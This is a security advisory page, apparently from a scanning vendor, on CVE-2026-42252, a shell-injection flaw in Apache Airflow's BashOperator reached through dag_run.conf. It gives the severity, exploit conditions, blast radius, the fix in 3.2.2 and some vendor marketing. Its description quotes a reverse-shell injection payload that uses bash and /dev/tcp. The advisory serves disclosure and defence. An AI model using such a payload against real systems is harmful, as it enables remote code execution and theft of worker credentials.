CVE-2026-42252: Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Metrics
- CVSS v3.1
- 9.1
- Severity
- CRITICAL
- Fixed in
- 3.2.2
- Affected Products
- 1
HarborGuard Analysis
Synopsis
This is a template-injection vulnerability in Apache Airflow's BashOperator, affecting versions 3.0.0 through 3.2.1. Airflow's official documentation showed an unquoted Jinja2 template pattern for passing DAG run configuration into shell commands; any authenticated user with the Dag.can_trigger permission can exploit this by supplying shell metacharacters in the conf field of the trigger API, reaching an os.exec call on the Airflow worker. Successful exploitation gives the attacker remote code execution on the worker node, with full read and write access to everything that process can reach. A patched-image rebuild at version 3.2.2 is available on HarborGuard for affected environments.
HarborGuard Coverage
Detection of CVE-2026-42252 is available across every HarborGuard environment: the CVE is ingested from upstream feeds (including the Apache Airflow security advisories and NVD) within minutes of publication and matched against customer images, including custom-built images that bundle apache-airflow between 3.0.0 and 3.2.1. Coverage extends to both pipeline-time scans and registry scans, so newly pushed images are checked without additional configuration.
AvailableTriage is available using the recorded CVSS v3.1 score of 9.1 (Critical), with per-environment compliance policy weighting applied to route findings to the appropriate team inbox inside each customer organization. Where a customer's policy defines severity thresholds or asset-tier classifications, HarborGuard applies those rules automatically during triage so the alert reaches the right owner without manual sorting.
AvailableA patched-image rebuild at apache-airflow 3.2.2 becomes available through HarborGuard once the upstream fix version is confirmed, and customers who opt into auto-remediation get a rebuild, a regression-test run, and a pull request opened against affected workloads automatically. Where compliance policy permits, this flow runs without manual intervention, and the PR includes the version delta so reviewers can confirm the change before merge.
AvailableExploit Conditions
- Network reachabilityRequired
The attacker must reach the Airflow trigger API over the network; the CVSS vector specifies AV:N, meaning no local or physical access is required.
- AuthenticationNot required
No authentication credential is needed at the network level (PR:N); however, the vulnerability description notes that a valid Dag.can_trigger permission is required in practice, meaning any account holding that permission is sufficient.
- Victim interactionNot required
The attacker submits a malicious conf payload directly to the trigger API; no other user needs to take any action for exploitation to succeed (UI:N).
- Attack complexityDetail
Attack complexity is Low (AC:L), meaning the exploit is reliable and requires no race conditions, special memory layout, or environmental pre-conditions beyond having network access to the trigger endpoint.
Blast Radius
- The attacker executes arbitrary shell commands on the Airflow worker process, gaining the same OS-level access as the airflow user running that worker.
- Confidential data accessible to the worker (DAG source code, connection credentials stored in the Airflow metadata database, environment variables, and mounted secrets) can be read directly.
- The attacker can write to any path the worker process owns, including DAG files, logs, and shared volumes, allowing persistent modification of pipeline definitions.
- Outbound network connections from the worker (as demonstrated by the reverse-shell payload in the description) allow the attacker to pivot to other internal services reachable from the worker network.
How HarborGuard Handles This
Available on HarborGuard: detection fires within minutes of publication for any customer image bundling apache-airflow 3.0.0 through 3.2.1, including custom images built from the official Apache Airflow base. For customers with auto-remediation enabled, a rebuilt image at version 3.2.2 is prepared, a regression-test run is executed against it, and a pull request is opened against affected workloads automatically; for high and critical severity issues, the median time from CVE publication to a merged patch PR in environments with auto-remediation enabled is around 90 minutes. Where compliance policy requires manual approval, the rebuild is queued and the PR is held in draft until a reviewer approves. In the interim, compensating controls worth considering include restricting the Dag.can_trigger permission to a minimal set of service accounts, applying network policy to limit worker egress to known destinations, and auditing existing DAG code for unquoted Jinja2 BashOperator patterns regardless of the upgrade timeline.
- Apache Software Foundation / Apache Airflow< 3.2.2 (from 3.0.0)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N